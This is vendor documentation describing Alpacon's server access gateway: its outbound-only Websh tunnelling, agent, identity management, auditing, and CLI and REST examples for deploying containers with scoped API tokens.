Architecture

Explanation of Alpacon’s overall system architecture and how it works.

Overview

Alpacon is an integrated access gateway providing network access, identity management, and audit capabilities in a single platform.

Problems with traditional approaches:

  • Network access: Complexity and security vulnerabilities of SSH/VPN
  • Identity management: Distributed local system management
  • Auditing: Scattered syslog or individual logging platforms

Alpacon solves all of these with one integrated platform.

System architecture

Network access: Websh protocol

Alpacon uses its proprietary Websh protocol to ensure both scalability and security.

Reverse connection architecture

[Server] --outbound--> [Alpacon cloud] <--inbound-- [Client]
         (HTTPS/WSS)                    (HTTPS/WSS)

Key features:

  • No inbound ports on servers (eliminates port 22 exposure)
  • Complete removal of attack vectors
  • Always TLS-encrypted connections
  • Web-friendly protocol

On-demand tunneling

  1. User requests server access
  2. Tunnel configured immediately for proxy
  3. Both user and server connect to proxy
  4. Secure authentication and relay
  5. Tunnel released on session end

Accessibility: Session persistence

Alpacon’s Websh sessions work reliably even with temporary network issues.

Features:

  • Cloud-based connections without VPN
  • Sessions persist unless explicitly terminated by user
  • Automatic session recovery on network reconnection
  • Complete shell access from mobile browsers

Resource management

Centrally manage all server assets.

Simple server registration

Register your server through the Alpacon workspace (ServersConnect Server) and run the generated installation script. The entire process takes less than 5 minutes.

See the Quickstart guide for step-by-step instructions.

Features provided:

  • Real-time resource status monitoring
  • Connection status alerts
  • Group-based permission management
  • Role-based access control

Key components

1. Alpamon agent (server-side)

Lightweight agent installed on servers to communicate with Alpacon cloud.

Functions:

  • Manage outbound HTTPS/WSS connections
  • System status monitoring
  • Command execution and file transfer
  • Automatic updates

2. Alpacon cloud (central platform)

Cloud service that relays all connections and management.

Components:

  • Access Gateway: Connection relay and proxy
  • Identity Provider: User authentication and permission management
  • Audit Logger: All activity logging and monitoring
  • API Server: REST API and CLI support

3. Clients (user-side)

Various ways to access servers.

Access methods:

  • Web browser: Immediate access without installation
  • Alpacon CLI: Command-line interface
  • REST API: Programmatic access
  • Mobile: Mobile browser support

Identity and Access Management (IAM)

Centralized identity management

All server access identities are centrally managed and provisioned.

Process:

  1. New employee → Invite to Alpacon
  2. Automatic ID provisioning on first access
  3. Automatic sync on permission changes
  4. Immediate access revocation on termination

Enhanced authentication

Supported MFA methods:

  • Biometric
  • Hardware security key
  • OTP (One-Time Password)
  • Email
  • SMS

Single sign-on:

  • Google Workspace
  • SAML (coming soon)

Passwordless system accounts

  • All system accounts created passwordless
  • Accessible only through Alpacon
  • Direct SSH key/password use blocked

Integration and interoperability

CI/CD pipeline integration

Use fine-grained API tokens instead of SSH keys.

CLI usage example

# Login
alpacon login https://alpacon.io/my-workspace -t "alpat-..."
 
# File upload
alpacon cp docker-compose.yml prod-docker:/opt/my-app/
alpacon cp .env prod-docker:/opt/my-app/
 
# Command execution
alpacon websh prod-docker docker compose -p my-app --env-file .env up -d

REST API usage example

curl -X POST https://your-workspace.us1.alpacon.io/api/events/commands/ \
     -H "Content-Type: application/json" \
     -H "Authorization: Token alpat-..." \
     -d '{"server": "7a50ea6c-2138-4d3f-9633-e50694c847c4", "line": "docker ps", "username": "docker"}'

Advantages:

  • Fine-grained command restrictions
  • Only allowed commands executable per token
  • CI misuse prevention

Auditing

Complete tracking of all server access and activities.

Features provided

  • Real-time monitoring: Real-time tracking of user terminal activity
  • Anomaly detection: Immediate blocking on abnormal activity detection
  • Post-audit: Review all executed commands
  • Full visibility: Complete visibility of all user activities

Audit log contents

  • Who (user/token)
  • When (timestamp)
  • Where (server/IP)
  • What (command executed/results)
  • Why (session context)

Security design principles

Zero Trust architecture

  • Move beyond perimeter-based security strategies
  • Verify all access requests
  • Principle of least privilege
  • Continuous verification

Defense in depth

  • Multi-layered security structure
  • Prevent single point of failure
  • Encrypted communications
  • Audit trail

Modern approach

  • SSH designed for humans → Alpacon supports both humans and machines
  • Static key management → Dynamic token management
  • Distributed logging → Centralized auditing

Availability

  • Redundancy as cloud service
  • High availability guarantee
  • Automatic failover
  • Global region support